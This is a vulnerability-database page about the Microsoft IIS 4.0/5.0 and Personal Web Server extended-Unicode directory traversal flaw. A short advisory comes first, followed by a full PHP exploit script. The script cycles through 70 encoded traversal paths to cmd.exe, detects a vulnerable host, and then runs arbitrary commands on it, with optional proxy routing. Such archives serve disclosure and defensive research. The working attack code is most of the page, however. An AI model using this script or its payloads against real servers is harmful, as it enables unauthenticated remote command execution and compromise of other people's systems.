Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Microsoft IIS 4.0/5.0 and PWS - Extended Unicode Directory Traversal (4)

🗓️ 17 Oct 2000 00:00:00Reported by BoloTronType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 42 Views

Microsoft IIS versions 4.0/5.0 and PWS have a directory traversal vulnerability via extended Unicode.

Code
source: https://www.securityfocus.com/bid/1806/info
 
Microsoft IIS 4.0 and 5.0 are both vulnerable to double dot "../" directory traversal exploitation if extended UNICODE character representations are used in substitution for "/" and "\".
 
Unauthenticated users may access any known file in the context of the IUSR_machinename account. The IUSR_machinename account is a member of the Everyone and Users groups by default, therefore, any file on the same logical drive as any web-accessible file that is accessible to these groups can be deleted, modified, or executed. Successful exploitation would yield the same privileges as a user who could successfully log onto the system to a remote user possessing no credentials whatsoever.
 
It has been discovered that a Windows 98 host running Microsoft Personal Web Server is also subject to this vulnerability. (March 18, 2001)
 
This is the vulnerability exploited by the Code Blue Worm.
 
**UPDATE**: It is believed that an aggressive worm may be in the wild that actively exploits this vulnerability.

#!php -q
<?

$vector_ataque[0]="/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+";

$vector_ataque[1]="/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+";

$vector_ataque[2]="/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";

$vector_ataque[3]="/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";

$vector_ataque[4]="/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+";

$vector_ataque[5]="/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+";

$vector_ataque[6]="/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+";

$vector_ataque[7]="/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+";

$vector_ataque[8]="/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+";

$vector_ataque[9]="/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+";

$vector_ataque[10]="/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+";

$vector_ataque[11]="/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";

$vector_ataque[12]="/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+";

$vector_ataque[13]="/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";

$vector_ataque[14]="/MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";

$vector_ataque[15]="/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+";

$vector_ataque[16]="/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+";

$vector_ataque[17]="/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+";

$vector_ataque[18]="/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+";

$vector_ataque[19]="/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";

$vector_ataque[20]="/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+";

$vector_ataque[21]="/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";

$vector_ataque[22]="/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";

$vector_ataque[23]="/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";

$vector_ataque[24]="/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+";

$vector_ataque[25]="/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";

$vector_ataque[26]="/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";

$vector_ataque[27]="/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+";

$vector_ataque[28]="/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+";

$vector_ataque[29]="/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+";

$vector_ataque[30]="/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+";

$vector_ataque[31]="/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";

$vector_ataque[32]="/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";

$vector_ataque[33]="/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+";

$vector_ataque[34]="/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";

$vector_ataque[35]="/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";

$vector_ataque[36]="/scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+";

$vector_ataque[37]="/scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+";

$vector_ataque[38]="/scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+";

$vector_ataque[39]="/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+";

$vector_ataque[40]="/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+";

$vector_ataque[41]="/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+";

$vector_ataque[42]="/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+";

$vector_ataque[43]="/scripts/..%c0%af../winnt/system32/cmd.exe?/c+";

$vector_ataque[44]="/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+";

$vector_ataque[45]="/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+";

$vector_ataque[46]="/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+";

$vector_ataque[47]="/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+";

$vector_ataque[48]="/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+";

$vector_ataque[49]="/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+";

$vector_ataque[50]="/scripts/..%c0%af../winnt/system32/cmd.exe?/c+";

$vector_ataque[51]="/scripts..%c1%9c../winnt/system32/cmd.exe?/c+";

$vector_ataque[52]="/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+";

$vector_ataque[53]="/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+";

$vector_ataque[54]="/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+";

$vector_ataque[55]="/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+";

$vector_ataque[56]="/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+";

$vector_ataque[57]="/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+";

$vector_ataque[58]="/scripts/..%c1%af../winnt/system32/cmd.exe?/c+";

$vector_ataque[59]="/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+";

$vector_ataque[60]="/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+";

$vector_ataque[61]="/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+";

$vector_ataque[62]="/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+";

$vector_ataque[63]="/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe\?/c+";

$vector_ataque[64]="/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";

$vector_ataque[65]="/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";

$vector_ataque[66]="/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";

$vector_ataque[67]="/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";

$vector_ataque[68]="/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";

$vector_ataque[69]="/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
        if(!isset($argv[1]))
        {
                echo

"\n\n--------------------------------------------------------------------\n";
                echo "------------- (c) UNICODE exploit for IIS 5.0/4.0 by BoloTron
------\n";
                echo
"--------------------------------------------------------------------\n\n";
                echo "Usage of the wicked device:\n";
                echo $argv[0]." -t www.victim.vic\n";
                echo $argv[0]." -t www.victim.vic -p proxy:port\n";
                echo $argv[0]."  www.victim.vic comand variant_number\n";
                echo $argv[0]." -p proxy:port www.victim.vic comand variant_number\n";
                echo "Options:\n";
                echo "-t --> Test the vulnerability (Try known variants till find the good
one)\n";
                echo "-p --> Attack through proxy\n";
                echo "\nUse Mode:\n1) Test the host and get the variants number in case
vulnerability exists\n";
                echo "2) Attack with command and variants number (optionaly you can use
proxy)\n";
                echo "Note : When you specify a command with spaces, replace spaces
with low script  \"_\" \n";
                echo "and you must double the backslash \"\\\". \n
Example".$argv[0]." -p proxy.prx:3128 www.victima.com dir_c:\\\\inetpub 49\n";
                echo "Thanks to An-tonio for the proxy support.\n";
                echo "Bug discover by Anonymous Post.\n";
                echo "TYPE ".$argv[0]." spanish, for Spanish help.\n";
        }
        else
        {
                if($argv[1]=="spanish")
                {
                echo
"\n\n--------------------------------------------------------------------\n";
                echo "------------- (c) Exploit UNICODE para IIS 5.0/4.0 por
BoloTron ----\n";
                echo
"--------------------------------------------------------------------\n\n";
                echo "Uso del artefacto maligno :\n";

                echo $argv[0]." -t www.victima.vic\n";
                echo $argv[0]." -t www.victima.vic -p proxy:puerto\n";
                echo $argv[0]."  www.victima.vic comando n�_de_variante\n";
                echo $argv[0]." -p proxy:port www.victima.vic comand
n�_de_variante\n";
                echo "Opciones:\n";
                echo "-t --> Testea la vulnerabilidad, prueba todas las
variantes hasta encontrar una buena.\n";
                echo "-p --> Ataque a traves de proxy\n";
                echo "\nModo de Empleo:\n1) Testear el host y anotar el
numero de variante en caso de ser vulnerable\n";
                echo "2) Atacar especificando comando y n� de variante
(opcionalmente puedes especificar un proxy)\n";
                echo "Nota : Cuando se especifica un comando en el que hay
espacios hay que sustituirlos por un guion bajo _ \n";
                echo "y las contrabarras hay que ponerlas dobles. \nEjemplo :
".$argv[0]." -p proxy.prx:3128 www.victima.com dir_c:\\\\inetpub 49\n";
                echo "Gracias a An-tonio por sus indicaciones en el soporte proxy.\n";
                echo "Bug descubierto por aviso anonimo.\n";
                exit;
                }
                if($argv[1]=="-t")
                {
                        if ($argv[3]=="-p")
                        {
                        for($i=0;$i<70;$i++)
                        {
                                $prox=explode(":",$argv[4]);
                                $comando="dir+c:\\";
                                $fp = fsockopen($prox[0], $prox[1]);
                                if(!$fp)
                                {
                                        echo "Conection failed...\n";
                                }
                                else
                                {
                                        fputs($fp,"GET
http://".$argv[2]."".$vector_ataque[$i]."".$comando." HTTP/1.0\n\n");
                                        echo "Trying variant number ".$i." ";
                                        while(!feof($fp))
                                        {
                                                $resul=$resul.fgets($fp,128);
                                        }
                                        if (ereg("<DIR>", $resul))
                                        {
                                                echo "-----> Vulnerable!!\n";
                                                exit;
                                        }
                                        else
                                        {
                                                echo "-----> NoT Vulnerable
:(\n";
                                        }

                                }
                                fclose($fp);
                        }
                        }
                        else
                        {
                        for($i=0;$i<70;$i++)
                        {
                                $port=80;
                                $comando="dir+c:\\";
                                $fp = fsockopen($argv[2], $port);
                                if(!$fp)
                                {
                                        echo "Conection failed...\n";
                                }
                                else
                                {
                                        fputs($fp,"GET
".$vector_ataque[$i]."".$comando." HTTP/1.0\n\n");
                                        echo "Trying variant number ".$i." ";
                                        while(!feof($fp))
                                        {
                                                $resul=$resul.fgets($fp,128);
                                        }
                                        if (ereg("<DIR>", $resul))
                                        {
                                                echo "-----> vulnerable!!\n";
                                                exit;
                                        }
                                        else
                                        {
                                                echo "-----> No Vulnerable :(\n";
                                        }

                                }
                                fclose($fp);
                        }
                        }
                }
                else
                {
                        if($argv[1]=="-p")
                        {
                                $prox=explode(":",$argv[2]);
                                $port=$prox[1];
                                $comando=ereg_replace("_","+",$argv[4]);
                                $fp = fsockopen($prox[0], $port);

                                if(!$fp)
                                {
                                        echo "Conection failed.\n";
                                }
                                else
                                {
                                        fputs($fp,"GET
http://".$argv[3]."".$vector_ataque[$argv[5]]."".$comando." HTTP/1.0\n\n");
                                        while(!feof($fp))
                                        {
                                                echo fgets($fp,128);
                                        }
                                }
                                fclose($fp);

                        }
                        else
                        {
                                $port=80;
                                $comando=ereg_replace("_","+",$argv[2]);
                                $fp = fsockopen($argv[1], $port);
                                if(!$fp)
                                {
                                        echo "Conection failed.\n";
                                }
                                else
                                {
                                        fputs($fp,"GET ".$vector_ataque[$argv[3]]."".$comando." HTTP/1.0\n\n");
                                        while(!feof($fp))
                                        {
                                                echo fgets($fp,128);
                                        }
                                }
                                fclose($fp);
                        }
                }




        }
?>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
17 Oct 2000 00:00Current
7.4High risk
Vulners AI Score7.4
microsoft iis vulnerabilitydirectory traversalextended unicode exploitationremote file accesscode blue worm
42